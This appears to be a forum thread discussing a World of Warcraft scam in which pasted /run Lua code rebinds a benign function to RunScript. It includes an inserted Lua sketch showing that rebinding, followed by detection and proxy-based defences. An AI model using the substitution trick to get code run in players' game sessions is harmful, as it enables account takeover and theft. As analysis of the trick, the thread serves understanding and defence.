You would if someone told you to replace trim() with eval(). :-)


The issue is that Lua treats functions as "first-class," meaning that they are stored in variables like other data. This is how named functions are created within the language, and function syntax is sugar for initializing a variable and storing a function in it.

This works with API functions also, which is why this works.
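A minimal Lua sketch of the point made in this comment and in the earlier one about overwriting RemoveExtraSpaces with RunScript, as an added example that is not code from the thread or from WoW: the API table, both function bodies, and the snapshot/tampered/protect helpers are assumed stand-ins, not the client's API.

```lua
-- Added example; API is a stand-in table for the script environment and the
-- bodies of both named functions are invented, not the WoW client's.
local API = {}
-- "function API.name(...)" is sugar for "API.name = function(...) end":
-- the function is a plain value under a string key, so it can be reassigned.
function API.RemoveExtraSpaces(s)       -- hypothetical text helper
  return (s:gsub("%s+", " "))
end
function API.RunScript(src)             -- hypothetical evaluator (Lua 5.2+ load)
  return assert(load(src, "=chat", "t", {}))()
end
local original = API.RemoveExtraSpaces
assert(API.RemoveExtraSpaces("a   b") == "a b")

-- The rebinding is one assignment; anything that calls the helper by name
-- afterwards hands its string to the evaluator instead.
API.RemoveExtraSpaces = API.RunScript
assert(API.RemoveExtraSpaces ~= original)
assert(API.RemoveExtraSpaces("return 1 + 1") == 2)

-- Defence 1 (detection): record the identity of sensitive functions at load
-- time and compare before trusting them.
local function snapshot(t, names)
  local seen = {}
  for _, n in ipairs(names) do seen[n] = t[n] end
  return seen
end
local function tampered(t, seen)
  for n, f in pairs(seen) do
    if t[n] ~= f then return n end
  end
end
local seen = snapshot({ RemoveExtraSpaces = original }, { "RemoveExtraSpaces" })
assert(tampered(API, seen) == "RemoveExtraSpaces")
-- Defence 2 (prevention): a proxy whose __newindex refuses protected keys.
local function protect(t, names)
  local frozen = {}
  for _, n in ipairs(names) do frozen[n] = true end
  return setmetatable({}, {
    __index = t,
    __newindex = function(_, k, v)
      if frozen[k] then error("refusing to rebind " .. tostring(k), 2) end
      t[k] = v
    end,
  })
end
local guarded = protect({ RemoveExtraSpaces = original }, { "RemoveExtraSpaces" })
local ok = pcall(function() guarded.RemoveExtraSpaces = API.RunScript end)
assert(not ok and guarded.RemoveExtraSpaces("x  y") == "x y")
```

The proxy only holds if scripts cannot reach the underlying table or call rawset on the proxy, so a real sandbox would also withhold those from the script's environment.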


Just the fact that RunScript is being substituted for something else should set off alarm bells.


Not everyone who plays WoW is a developer.


The OP specified "moderately sophisticated."


It's not the function that's the problem, it's replacing it with the run function, which (to me) is an obvious sign of shenanigans.


The 'RunScript' keyword does give a slight, glaring hint IMHO.


Most people who play WoW don't know what a script is. They just click mobs and do raids. It's not obvious at all to a lot of people, just like phone scams, people who go door to door to scam, or even spam emails. It's for a good reason these things still go on: they are still effective against people who aren't developers or IT enthusiasts, which most gamers aren't. They like games, not scripting engines and Lua interpreters or whatever.


This attack would be pretty easy to mitigate. Why does WoW allow you to run scripts in your chat window? Who needs that functionality?

Yes, don't run untrusted code as a user, but also developers should be practicing defense in depth[0]. This isn't like pasting something into a web browser's dev console or a Bash prompt, WoW has the ability to just outright turn this behavior off.

Look at something like the Signal source code, they flat out turn off webviews entirely[1]. So an entire class of phishing attacks just vanishes, regardless of what they're doing to block XSS or malicious links.

WoW should do the same thing - your chat window should not have access to its host environment, if it even needs the ability to run scripts in the first place.

[0]: https://en.wikipedia.org/wiki/Defense_in_depth_%28computing%...

[1]: https://github.com/signalapp/Signal-Desktop/blob/development...


> Why does WoW allow you to run scripts in your chat window? Who needs that functionality?

The "chat" window in WoW is more like a shell interface/CLI than a pure chat window and it's been that way since the inception of WoW. The mod system is loosely dropped on top of it: basically add-ons in WoW amount to bash scripts.

It's a pretty hacky system that seems like it was made to add modding capability as quickly as possible during development. The fact that such an integral system has never been rewritten isn't hard to believe.


I can buy that -- but wouldn't they still at some point want to make the main chat window for the game into some kind of safer wrapper around the bash prompt?

This is coming from someone who doesn't play WoW; is it common for a mod to expose custom commands in chat or something? Or are mods maybe using it as a buffer to send commands?

I guess if they're detecting and popping up a warning prompt, but they're not willing to get rid of the prompt and just always escape the input, there must be some stuff out there that utterly depends on players clicking "allow". That's baffling to me, but I am often baffled.


> is it common for a mod to expose custom commands in chat or something?

Yes, it's quite common for mods to expose custom commands, although these are not raw Lua functions but rather "slash commands", e.g. /foo

Other than for messaging/chat, the chat box can also be used for various commands for actions your character should perform, e.g. /wave, /target, /sleep and the game also has a built-in macro system that lets you combine several of these into a "macro" that you can then execute by pressing a single button. But these are all "safe", i.e. they don't eval raw Lua code.

There are some WoW quest-tracking websites that will sometimes give you little snippets of Lua to execute via /run that will e.g. query the game about whether you completed the given quest, but in general normal users shouldn't need to use /run, it's more of a feature for mod developers.


It's common to interact with UI code and gameplay macros through the text interface.

The system might come off as insecure, but frankly that flexibility added a lot of value to WoW over its lifespan.


I really have no idea why it allows you to run scripts in the chat window, LoL. It's useful for me, because I sometimes write addons and use it as a kind of REPL, but surely this could be hidden behind a "developer mode" in some Config.wtf file. I think that nobody really thought about it too much, just like browsers allowed javascript: URLs in the past. Nowadays if you're pasting /run stuff into the chat window, WoW asks for confirmation whether you really want to execute it, so they took some measures to limit it. Also there are tons of useful `/run` scripts that some people probably use, and that experience is probably important enough to preserve that functionality.


The vast majority of players won't realize that they can run untrusted code just by typing a few characters into a chat window. To be fair, most chat windows don't work that way.


WeakAuras also had an import/export feature that was widely abused in a similar way.


you guise i got phat loot just enter this magic command and it will appear in your inventory... Newbies' eyes get wide open O.O

